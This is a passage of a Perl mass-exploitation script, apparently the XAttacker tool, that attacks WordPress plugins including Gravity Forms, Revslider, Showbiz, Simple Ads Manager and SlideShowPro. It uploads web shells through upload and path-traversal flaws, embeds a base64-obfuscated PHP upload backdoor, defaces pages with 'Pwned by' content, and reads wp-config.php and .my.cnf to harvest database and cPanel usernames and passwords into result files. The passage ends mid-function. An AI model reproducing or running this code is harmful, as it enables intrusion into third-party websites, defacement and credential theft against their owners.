  3126. print color('bold green'),"VULN";
  3127. print color('bold white'),"\n";
  3128. print color('bold green')," [";
  3129. print color('bold red'),"+";
  3130. print color('bold green'),"] ";
  3131. print color('bold white'),"Shell Uploaded Successfully\n";
  3132. print color('bold white'),"  [Link] => $zoomerup\n";
  3133. open (TEXT, '>>Result/Shells.txt');
  3134. print TEXT "$zoomerup\n";
  3135. close (TEXT);
  3136. }else{
  3137. print color('bold red'),"[";
  3138. print color('bold green'),"+";
  3139. print color('bold red'),"] ";
  3140. print color('bold white'),"dzs-videogallery";
  3141. print color('bold white')," .................. ";
  3142. print color('bold red'),"Failed";
  3143. print color('bold white'),"\n";
  3144. }
  3145. }
  3146.  
  3147. ################ Gravity Forms #####################
  3148. sub gravityforms(){
  3149. my $url = "$site/?gf_page=upload";
  3150. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3151. $ua->timeout(10);
  3152. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3153.  
  3154. my $gravityformsres = $ua->post($url, Content_Type => "form-data", Content => [file => ["tool/BackDoor.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../", name => "css.php.jd"]);
  3155.  
  3156. $gravityformsup = "$site/wp-content/uploads/_input_3_css.php.jd?X=Attacker";
  3157. my $checkk = $ua->get("$site/wp-content/uploads/_input_3_css.php.jd?X=Attacker")->content;
  3158. if($checkk =~/X Attacker/) {
  3159. print color('bold red'),"[";
  3160. print color('bold green'),"+";
  3161. print color('bold red'),"] ";
  3162. print color('bold white'),"Gravity Forms";
  3163. print color('bold white')," ............... ";
  3164. print color('bold green'),"VULN\n";
  3165. print color('bold green')," [";
  3166. print color('bold red'),"+";
  3167. print color('bold green'),"] ";
  3168. print color('bold white'),"Shell Uploaded Successfully\n";
  3169. print color('bold white'),"  [Link] => $gravityformsup\n";
  3170. open (TEXT, '>>Result/Shells.txt');
  3171. print TEXT "$gravityformsup\n";
  3172. close (TEXT);
  3173. }
  3174. else{
  3175. gravityforms1();
  3176. }
  3177. }
  3178. sub gravityforms1(){
  3179. my $url = "$site/?gf_page=upload";
  3180. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3181. $ua->timeout(10);
  3182. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3183.  
  3184. my $gravityformsres = $ua->post($url, Content_Type => "form-data", Content => [file => ["tool/BackDoor.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../", name => "css.phtml"]);
  3185.  
  3186. $gravityformsup = "$site/wp-content/uploads/_input_3_css.phtml?X=Attacker";
  3187. my $checkk = $ua->get("$site/wp-content/uploads/_input_3_css.phtml?X=Attacker")->content;
  3188. if($checkk =~/X Attacker/) {
  3189. print color('bold red'),"[";
  3190. print color('bold green'),"+";
  3191. print color('bold red'),"] ";
  3192. print color('bold white'),"Gravity Forms";
  3193. print color('bold white')," ............... ";
  3194. print color('bold green'),"VULN\n";
  3195. print color('bold green')," [";
  3196. print color('bold red'),"+";
  3197. print color('bold green'),"] ";
  3198. print color('bold white'),"Shell Uploaded Successfully\n";
  3199. print color('bold white'),"  [Link] => $gravityformsup\n";
  3200. open (TEXT, '>>Result/Shells.txt');
  3201. print TEXT "$gravityformsup\n";
  3202. close (TEXT);
  3203. }
  3204. else{
  3205. gravityforms2();
  3206. }
  3207. }
  3208. ################ Gravity Forms #####################
  3209. sub gravityforms2(){
  3210. my $url = "$site/?gf_page=upload";
  3211. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3212. $ua->timeout(10);
  3213. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3214.  
  3215. my $gravityformsres2 = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["tool/index.jpg"], form_id => '1', name => 'izo.html', gform_unique_id => '../../../../../', field_id => '3',]);
  3216. $gravityformsupp = "$site/_input_3_izo.html";
  3217. my $checkgravityformsupp = $ua->get("$gravityformsupp")->content;
  3218. if ($checkgravityformsupp =~ /izocin/) {
  3219.  
  3220. print color('bold red'),"[";
  3221. print color('bold green'),"+";
  3222. print color('bold red'),"] ";
  3223. print color('bold white'),"Gravity Forms";
  3224. print color('bold white')," ............... ";
  3225. print color('bold green'),"VULN\n";
  3226. print color('bold green'),"  [";
  3227. print color('bold red'),"-";
  3228. print color('bold green'),"] ";
  3229. print color('bold red'),"Shell Not Uploaded\n";
  3230. print color('bold green'),"  [";
  3231. print color('bold red'),"-";
  3232. print color('bold green'),"] ";
  3233. print color('bold white'),"Index Uploaded Successfully\n";
  3234. print color('bold white'),"  [Link] => $gravityformsupp\n";
  3235. open (TEXT, '>>Result/index.txt');
  3236. print TEXT "$gravityformsupp\n";
  3237. close (TEXT);
  3238.  
  3239. }
  3240. else{
  3241. print color('bold red'),"[";
  3242. print color('bold green'),"+";
  3243. print color('bold red'),"] ";
  3244. print color('bold white'),"Gravity Forms";
  3245. print color('bold white')," ..................... ";
  3246. print color('bold red'),"Failed";
  3247. print color('bold white'),"\n";
  3248. }
  3249. }
  3250. ################ Gravity Forms #####################
  3251. sub gravityformsb(){
  3252. my $indexa='<?php eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));?>&field_id=3&form_id=1&gform_unique_id=../../../../uploads/gravity_forms/&name=izo.phtml';
  3253. my $url = "$site/?gf_page=upload";
  3254. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3255. $ua->timeout(10);
  3256. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3257.  
  3258. my $gravityformsres = $ua->post($url, Content_Type => "multipart/form-data", Content => $indexa);
  3259.  
  3260. $gravityformsup = "$site/wp-content/uploads/gravity_forms/_input_3_izo.phtml";
  3261. my $checkk = $ua->get("$site/wp-content/uploads/gravity_forms/_input_3_izo.phtml")->content;
  3262. if($checkk =~/izocin/) {
  3263. print color('bold red'),"[";
  3264. print color('bold green'),"+";
  3265. print color('bold red'),"] ";
  3266. print color('bold white'),"Gravity2 Forms";
  3267. print color('bold white')," .............. ";
  3268. print color('bold green'),"VULN\n";
  3269. print color('bold green')," [";
  3270. print color('bold red'),"+";
  3271. print color('bold green'),"] ";
  3272. print color('bold white'),"Shell Uploaded Successfully\n";
  3273. print color('bold white'),"  [Link] => $gravityformsup\n";
  3274. open (TEXT, '>>Result/Shells.txt');
  3275. print TEXT "$gravityformsup\n";
  3276. close (TEXT);
  3277. }
  3278. else{
  3279. print color('bold red'),"[";
  3280. print color('bold green'),"+";
  3281. print color('bold red'),"] ";
  3282. print color('bold white'),"Gravity2 Forms";
  3283. print color('bold white')," .................... ";
  3284. print color('bold red'),"Failed";
  3285. print color('bold white'),"\n";
  3286. }
  3287. }
  3288. ################ Revslider upload shell #####################
  3289. sub revslider(){
  3290.  
  3291. my $url = "$site/wp-admin/admin-ajax.php";
  3292.  
  3293. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3294. $ua->timeout(10);
  3295. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3296.  
  3297. my $revslidres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["tool/XAttackerevs.zip"]]);
  3298.  
  3299. my $revs = $ua->get("$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3300. my $revavada = $ua->get("$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3301. my $revstriking = $ua->get("$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3302. my $revincredible = $ua->get("$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3303. my $revultimatum = $ua->get("$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3304. my $revmedicate = $ua->get("$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3305. my $revcentum = $ua->get("$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3306. my $revbeachapollo = $ua->get("$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3307. my $revcuckootap = $ua->get("$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3308. my $revpindol = $ua->get("$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3309. my $revdesignplus = $ua->get("$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3310. my $revrarebird = $ua->get("$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3311. my $revandre = $ua->get("$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  3312.  
  3313. if($revs =~ /X Attacker/){
  3314. print color('bold red'),"[";
  3315. print color('bold green'),"+";
  3316. print color('bold red'),"] ";
  3317. print color('bold white'),"Revslider";
  3318. print color('bold white')," ......................... ";
  3319. print color('bold green'),"VULN";
  3320. print color('bold white'),"\n";
  3321. print color('bold green')," [";
  3322. print color('bold red'),"+";
  3323. print color('bold green'),"] ";
  3324. print color('bold white'),"Shell Uploaded Successfully\n";
  3325. print color('bold white'),"  [Link] => $site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3326. open (TEXT, '>>Result/Shells.txt');
  3327. print TEXT "$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3328. close (TEXT);
  3329. }
  3330.  
  3331. elsif($revavada =~ /X Attacker/){
  3332. print color('bold red'),"[";
  3333. print color('bold green'),"+";
  3334. print color('bold red'),"] ";
  3335. print color('bold white'),"Revslider";
  3336. print color('bold white')," ......................... ";
  3337. print color('bold green'),"VULN";
  3338. print color('bold white'),"\n";
  3339. print color('bold green')," [";
  3340. print color('bold red'),"+";
  3341. print color('bold green'),"] ";
  3342. print color('bold white'),"Shell Uploaded Successfully\n";
  3343. print color('bold white'),"  [Link] => $site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3344. open (TEXT, '>>Result/Shells.txt');
  3345. print TEXT "$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3346. close (TEXT);
  3347. }
  3348.  
  3349.  
  3350. elsif($revstriking =~ /X Attacker/){
  3351. print color('bold red'),"[";
  3352. print color('bold green'),"+";
  3353. print color('bold red'),"] ";
  3354. print color('bold white'),"Revslider";
  3355. print color('bold white')," ......................... ";
  3356. print color('bold green'),"VULN";
  3357. print color('bold white'),"\n";
  3358. print color('bold green')," [";
  3359. print color('bold red'),"+";
  3360. print color('bold green'),"] ";
  3361. print color('bold white'),"Shell Uploaded Successfully\n";
  3362. print color('bold white'),"  [Link] => $site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3363. open (TEXT, '>>Result/Shells.txt');
  3364. print TEXT "$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3365. close (TEXT);
  3366. }
  3367.  
  3368. elsif($revincredible =~ /X Attacker/){
  3369. print color('bold red'),"[";
  3370. print color('bold green'),"+";
  3371. print color('bold red'),"] ";
  3372. print color('bold white'),"Revslider";
  3373. print color('bold white')," ......................... ";
  3374. print color('bold green'),"VULN";
  3375. print color('bold white'),"\n";
  3376. print color('bold green')," [";
  3377. print color('bold red'),"+";
  3378. print color('bold green'),"] ";
  3379. print color('bold white'),"Shell Uploaded Successfully\n";
  3380. print color('bold white'),"  [Link] => $site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3381. open (TEXT, '>>Result/Shells.txt');
  3382. print TEXT "$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3383. close (TEXT);
  3384. }
  3385.  
  3386. elsif($revmedicate =~ /X Attacker/){
  3387. print color('bold red'),"[";
  3388. print color('bold green'),"+";
  3389. print color('bold red'),"] ";
  3390. print color('bold white'),"Revslider";
  3391. print color('bold white')," ......................... ";
  3392. print color('bold green'),"VULN";
  3393. print color('bold white'),"\n";
  3394. print color('bold green')," [";
  3395. print color('bold red'),"+";
  3396. print color('bold green'),"] ";
  3397. print color('bold white'),"Shell Uploaded Successfully\n";
  3398. print color('bold white'),"  [Link] => $site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3399. open (TEXT, '>>Result/Shells.txt');
  3400. print TEXT "$site$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3401. close (TEXT);
  3402. }
  3403.  
  3404. elsif($revultimatum =~ /X Attacker/){
  3405. print color('bold red'),"[";
  3406. print color('bold green'),"+";
  3407. print color('bold red'),"] ";
  3408. print color('bold white'),"Revslider";
  3409. print color('bold white')," ......................... ";
  3410. print color('bold green'),"VULN";
  3411. print color('bold white'),"\n";
  3412. print color('bold green')," [";
  3413. print color('bold red'),"+";
  3414. print color('bold green'),"] ";
  3415. print color('bold white'),"Shell Uploaded Successfully\n";
  3416. print color('bold white'),"  [Link] => $site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3417. open (TEXT, '>>Result/Shells.txt');
  3418. print TEXT "$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3419. close (TEXT);
  3420. }
  3421.  
  3422. elsif($revcentum =~ /X Attacker/){
  3423. print color('bold red'),"[";
  3424. print color('bold green'),"+";
  3425. print color('bold red'),"] ";
  3426. print color('bold white'),"Revslider";
  3427. print color('bold white')," ......................... ";
  3428. print color('bold green'),"VULN";
  3429. print color('bold white'),"\n";
  3430. print color('bold green')," [";
  3431. print color('bold red'),"+";
  3432. print color('bold green'),"] ";
  3433. print color('bold white'),"Shell Uploaded Successfully\n";
  3434. print color('bold white'),"  [Link] => $site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3435. open (TEXT, '>>Result/Shells.txt');
  3436. print TEXT "$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3437. close (TEXT);
  3438. }
  3439.  
  3440. elsif($revbeachapollo =~ /X Attacker/){
  3441. print color('bold red'),"[";
  3442. print color('bold green'),"+";
  3443. print color('bold red'),"] ";
  3444. print color('bold white'),"Revslider";
  3445. print color('bold white')," ......................... ";
  3446. print color('bold green'),"VULN";
  3447. print color('bold white'),"\n";
  3448. print color('bold green')," [";
  3449. print color('bold red'),"+";
  3450. print color('bold green'),"] ";
  3451. print color('bold white'),"Shell Uploaded Successfully\n";
  3452. print color('bold white'),"  [Link] => $site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3453. open (TEXT, '>>Result/Shells.txt');
  3454. print TEXT "$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3455. close (TEXT);
  3456. }
  3457.  
  3458. elsif($revcuckootap =~ /X Attacker/){
  3459. print color('bold red'),"[";
  3460. print color('bold green'),"+";
  3461. print color('bold red'),"] ";
  3462. print color('bold white'),"Revslider";
  3463. print color('bold white')," ......................... ";
  3464. print color('bold green'),"VULN";
  3465. print color('bold white'),"\n";
  3466. print color('bold green')," [";
  3467. print color('bold red'),"+";
  3468. print color('bold green'),"] ";
  3469. print color('bold white'),"Shell Uploaded Successfully\n";
  3470. print color('bold white'),"  [Link] => $site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3471. open (TEXT, '>>Result/Shells.txt');
  3472. print TEXT "$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3473. close (TEXT);
  3474. }
  3475.  
  3476. elsif($revpindol =~ /X Attacker/){
  3477. print color('bold red'),"[";
  3478. print color('bold green'),"+";
  3479. print color('bold red'),"] ";
  3480. print color('bold white'),"Revslider";
  3481. print color('bold white')," ......................... ";
  3482. print color('bold green'),"VULN";
  3483. print color('bold white'),"\n";
  3484. print color('bold green')," [";
  3485. print color('bold red'),"+";
  3486. print color('bold green'),"] ";
  3487. print color('bold white'),"Shell Uploaded Successfully\n";
  3488. print color('bold white'),"  [Link] => $site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3489. open (TEXT, '>>Result/Shells.txt');
  3490. print TEXT "$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3491. close (TEXT);
  3492. }
  3493.  
  3494. elsif($revdesignplus =~ /X Attacker/){
  3495. print color('bold red'),"[";
  3496. print color('bold green'),"+";
  3497. print color('bold red'),"] ";
  3498. print color('bold white'),"Revslider";
  3499. print color('bold white')," ......................... ";
  3500. print color('bold green'),"VULN";
  3501. print color('bold white'),"\n";
  3502. print color('bold green')," [";
  3503. print color('bold red'),"+";
  3504. print color('bold green'),"] ";
  3505. print color('bold white'),"Shell Uploaded Successfully\n";
  3506. print color('bold white'),"  [Link] => $site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3507. open (TEXT, '>>Result/Shells.txt');
  3508. print TEXT "$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3509. close (TEXT);
  3510. }
  3511.  
  3512. elsif($revrarebird =~ /X Attacker/){
  3513. print color('bold red'),"[";
  3514. print color('bold green'),"+";
  3515. print color('bold red'),"] ";
  3516. print color('bold white'),"Revslider";
  3517. print color('bold white')," ......................... ";
  3518. print color('bold green'),"VULN";
  3519. print color('bold white'),"\n";
  3520. print color('bold green')," [";
  3521. print color('bold red'),"+";
  3522. print color('bold green'),"] ";
  3523. print color('bold white'),"Shell Uploaded Successfully\n";
  3524. print color('bold white'),"  [Link] => $site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3525. open (TEXT, '>>Result/Shells.txt');
  3526. print TEXT "$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3527. close (TEXT);
  3528. }
  3529.  
  3530. elsif($revandre =~ /X Attacker/){
  3531. print color('bold red'),"[";
  3532. print color('bold green'),"+";
  3533. print color('bold red'),"] ";
  3534. print color('bold white'),"Revslider";
  3535. print color('bold white')," ......................... ";
  3536. print color('bold green'),"VULN";
  3537. print color('bold white'),"\n";
  3538. print color('bold green')," [";
  3539. print color('bold red'),"+";
  3540. print color('bold green'),"] ";
  3541. print color('bold white'),"Shell Uploaded Successfully\n";
  3542. print color('bold white'),"  [Link] => $site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3543. open (TEXT, '>>Result/Shells.txt');
  3544. print TEXT "$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  3545. close (TEXT);
  3546. }
  3547.  
  3548. else{
  3549. print color('bold red'),"[";
  3550. print color('bold green'),"+";
  3551. print color('bold red'),"] ";
  3552. print color('bold white'),"Revslider Upload Shell";
  3553. print color('bold white')," ............ ";
  3554. print color('bold red'),"Failed";
  3555. print color('bold white'),"\n";
  3556. revsliderajax();
  3557. }
  3558. }
  3559. ################ Revslider ajax #####################
  3560. sub revsliderajax(){
  3561.  
  3562. my $url = "$site/wp-admin/admin-ajax.php";
  3563.  
  3564. my $revslidajaxres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_captions_css", data => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center><b>Pwned by<b>"]);
  3565.  
  3566. $revsliderajax = $site . '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';
  3567.  
  3568. my $checkrevsajax = $ua->get("$revsliderajax")->content;
  3569. if($checkrevsajax =~ /Pwned/){
  3570. print color('bold red'),"[";
  3571. print color('bold green'),"+";
  3572. print color('bold red'),"] ";
  3573. print color('bold white'),"Revslider Dafece Ajax";
  3574. print color('bold white')," ............. ";
  3575. print color('bold green'),"VULN";
  3576. print color('bold white'),"\n";
  3577. print color('bold green'),"  [";
  3578. print color('bold red'),"-";
  3579. print color('bold green'),"] ";
  3580. print color('bold white'),"Defaced Successfully\n";
  3581. print color('bold white'),"  [Link] => $revsliderajax\n";
  3582. open (TEXT, '>>Result/index.txt');
  3583. print TEXT "$revsliderajax\n";
  3584. close (TEXT);
  3585. }else{
  3586. print color('bold red'),"[";
  3587. print color('bold green'),"+";
  3588. print color('bold red'),"] ";
  3589. print color('bold white'),"Revslider Dafece Ajax";
  3590. print color('bold white')," ............. ";
  3591. print color('bold red'),"Failed";
  3592. print color('bold white'),"\n";
  3593. }
  3594. }
  3595.  
  3596. sub getconfig(){
  3597. $url = "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  3598.  
  3599. $resp = $ua->request(HTTP::Request->new(GET => $url ));
  3600. $conttt = $resp->content;
  3601. if($conttt =~ m/DB_NAME/g){
  3602. print color('bold red'),"[";
  3603. print color('bold green'),"+";
  3604. print color('bold red'),"] ";
  3605. print color('bold white'),"Revslider Get Config";
  3606. print color('bold white')," .............. ";
  3607. print color('bold green'),"VULN\n";
  3608.      open(save, '>>Result/Config.txt');  
  3609.     print save "[RevsliderConfig] $url\n";  
  3610.     close(save);
  3611. }else{
  3612. print color('bold red'),"[";
  3613. print color('bold green'),"+";
  3614. print color('bold red'),"] ";
  3615. print color('bold white'),"Revslider Get Config";
  3616. print color('bold white')," .............. ";
  3617. print color('bold red'),"Failed\n";
  3618. }
  3619. }
  3620.  
  3621. sub getcpconfig(){
  3622. $ua = LWP::UserAgent->new(keep_alive => 1);
  3623. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  3624. $ua->timeout (10);
  3625. $cpup = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf";
  3626. $cpuplink = "$site/$cpup";
  3627. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  3628. $cont = $resp->content;
  3629. if($cont =~ m/user=/g){
  3630. print color('bold red'),"[";
  3631. print color('bold green'),"+";
  3632. print color('bold red'),"] ";
  3633. print color('bold white'),"Revslider Get cPanel";
  3634. print color('bold white')," .............. ";
  3635. print color('bold green'),"VULN\n";
  3636.  
  3637. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  3638. $contt = $resp->content;
  3639. while($contt =~ m/user/g){
  3640.         if ($contt =~ /user=(.*)/){
  3641.  
  3642. print color('bold green')," [";
  3643. print color('bold red'),"+";
  3644. print color('bold green'),"] ";
  3645. print color('bold white'),"URL : $site/cpanel\n";
  3646. print color('bold green')," [";
  3647. print color('bold red'),"+";
  3648. print color('bold green'),"] ";
  3649. print color('bold white'),"USER : $1\n";
  3650. open (TEXT, '>>Result/cPanel.txt');
  3651. print TEXT "Url : $site\n";
  3652. print TEXT "USER : $1\n";
  3653. close (TEXT);
  3654.         }
  3655.         if ($contt =~ /password="(.*)"/){
  3656.             print color('bold green')," [";
  3657. print color('bold red'),"+";
  3658. print color('bold green'),"] ";
  3659. print color('bold white'),"PASS : $1\n";
  3660. open (TEXT, '>>Result/cPanel.txt');
  3661. print TEXT "PASS : $1\n";
  3662. close (TEXT);
  3663.         }
  3664.  
  3665.  
  3666. }
  3667. }else{
  3668. print color('bold red'),"[";
  3669. print color('bold green'),"+";
  3670. print color('bold red'),"] ";
  3671. print color('bold white'),"Revslider Get cPanel";
  3672. print color('bold white')," .............. ";
  3673. print color('bold red'),"Failed\n";
  3674. }
  3675. }
  3676.  
  3677. ################ Showbiz #####################
  3678. sub showbiz(){
  3679. my $url = "$url/wp-admin/admin-ajax.php";
  3680. sub randomagent {
  3681. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  3682. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  3683. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  3684. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  3685. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  3686. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  3687. );
  3688. my $random = $array[rand @array];
  3689. return($random);
  3690. }
  3691. my $useragent = randomagent();
  3692.  
  3693. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3694. $ua->timeout(10);
  3695. $ua->agent($useragent);
  3696. my $showbizres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "showbiz_ajax_action", client_action => "update_plugin", update_file => ["tool/XAttacker.php"]]);
  3697.  
  3698. $showbizup = $site . '/wp-content/plugins/showbiz/temp/update_extract/XAttacker.php?X=Attacker';
  3699.  
  3700. my $checkshow = $ua->get("$showbizup")->content;
  3701. if($checkshow =~ /X Attacker/){
  3702. print color('bold red'),"[";
  3703. print color('bold green'),"+";
  3704. print color('bold red'),"] ";
  3705. print color('bold white'),"Showbiz";
  3706. print color('bold white')," ........................... ";
  3707. print color('bold green'),"VULN\n";
  3708. print color('bold green')," [";
  3709. print color('bold red'),"+";
  3710. print color('bold green'),"] ";
  3711. print color('bold white'),"Shell Uploaded Successfully\n";
  3712. print color('bold white'),"  [Link] => $showbizup\n";
  3713. open (TEXT, '>>Result/Shells.txt');
  3714. print TEXT "$showbizup\n";
  3715. close (TEXT);
  3716. }else{
  3717. print color('bold red'),"[";
  3718. print color('bold green'),"+";
  3719. print color('bold red'),"] ";
  3720. print color('bold white'),"Showbiz";
  3721. print color('bold white')," ........................... ";
  3722. print color('bold red'),"Failed\n";
  3723. }
  3724. }
  3725.  
  3726. ################ Simple Ads Manager #####################
  3727. sub ads(){  
  3728. my $url = "$site/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php";
  3729.  
  3730. my $adsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [uploadfile => ["tool/XAttacker.php"], action => 'upload_ad_image', path => '',]);
  3731. $adsup="$site/wp-content/plugins/simple-ads-manager/XAttacker.php?X=Attacker";
  3732. if ($adsres->content =~ /{"status":"success"}/) {
  3733. print color('bold red'),"[";
  3734. print color('bold green'),"+";
  3735. print color('bold red'),"] ";
  3736. print color('bold white'),"Simple Ads Manager";
  3737. print color('bold white')," ................ ";
  3738. print color('bold green'),"VULN\n";
  3739. print color('bold green')," [";
  3740. print color('bold red'),"+";
  3741. print color('bold green'),"] ";
  3742. print color('bold white'),"Shell Uploaded Successfully\n";
  3743. print color('bold white'),"  [Link] => $adsup\n";
  3744. open (TEXT, '>>Result/Shells.txt');
  3745. print TEXT "$adsup\n";
  3746. close (TEXT);
  3747. }else{
  3748. print color('bold red'),"[";
  3749. print color('bold green'),"+";
  3750. print color('bold red'),"] ";
  3751. print color('bold white'),"Simple Ads Manager";
  3752. print color('bold white')," ................ ";
  3753. print color('bold red'),"Failed\n";
  3754. }
  3755. }
  3756.  
  3757. ################ Slide Show Pro #####################
  3758. sub slideshowpro(){
  3759. my $url = "$site/wp-admin/admin.php?page=slideshowpro_manage";
  3760.  
  3761. my $slideshowres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'pro_add_new_album', album_name => '', album_desc => '',]);
  3762.  
  3763. if ($slideshowres->content =~ /\/uploads\/slideshowpro\/(.*?)\/big\/XAttacker.php/) {
  3764. $uploadfolder=$1;
  3765. $sspup="$site/wp-content/uploads/slideshowpro/$uploadfolder/big/XAttacker.php?X=Attacker";
  3766.  
  3767. print color('bold red'),"[";
